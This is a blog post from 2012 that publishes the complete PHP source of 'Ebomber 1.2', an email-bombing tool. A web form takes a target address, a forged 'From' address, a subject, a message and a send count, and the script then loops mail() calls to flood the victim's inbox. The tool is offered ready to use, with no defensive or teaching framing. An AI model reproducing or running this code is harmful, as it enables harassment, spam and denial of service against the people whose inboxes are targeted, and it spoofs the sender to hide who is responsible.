This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Wednesday 10 October 2012

Email Spammer



<?php?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Ebomber 1.2</title>
<meta name="Description" content="A PHP Email Bomber" />
</head>

<body>
<form method="post" action="">
<b>Email To Bomb:</b><br />
<input type="text" name="emailto" size="53"><br />
<b>Return Email:</b><br />
<input type="text" name="emailfrom" size="53"><br />
<b>Subject:</b><br />
<input type="text" name="subject" size="53"><br />
<b>Message Body:</b><br />
<textarea name="message" rows="6" cols="40"></textarea>
<br /><br />

<b>Send <input type="text" name="sendamount" size="1" value="1"> Email(s).</b> <input type="submit" name="bombmail" value="Start The Madness!">
</form>

<?php
if (isset($_REQUEST['bombmail'])){
$emailto = $_POST['emailto'];
$emailfrom = "From: ".$_POST['emailfrom'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$sendamount = $_POST['sendamount'];
$i = 0;
if ($emailto == ""){
echo "<br /><b>Error: You must enter an email to bomb!</b>";
} else if ($emailfrom == ""){
echo "<br /><b>Error: You must enter an email to send from!</b>";
} else if ($subject == ""){
echo "<br /><b>Error: You did not enter a subject for your message!</b>";
} else if ($message == ""){
echo "<br /><b>Error: You did not enter a message to send!</b>";
} else if ($sendamount == ""){
echo "<br /><b>Error: You did not enter a valid amount of emails to send!</b>";
} else {
do {
mail($emailto, $subject, $message, $emailfrom);
$i++;
}
while ($i<$sendamount);
echo "<br /><b>You have successfully bombed ".$emailto." with ".$i." email(s)!</b>";
}
}
//As stated above, removing the credits won't do anything but it would be nice if you kept them there.
?>
<br />
<b>Created By Jordan Dawson</b><br />
</body>
</html>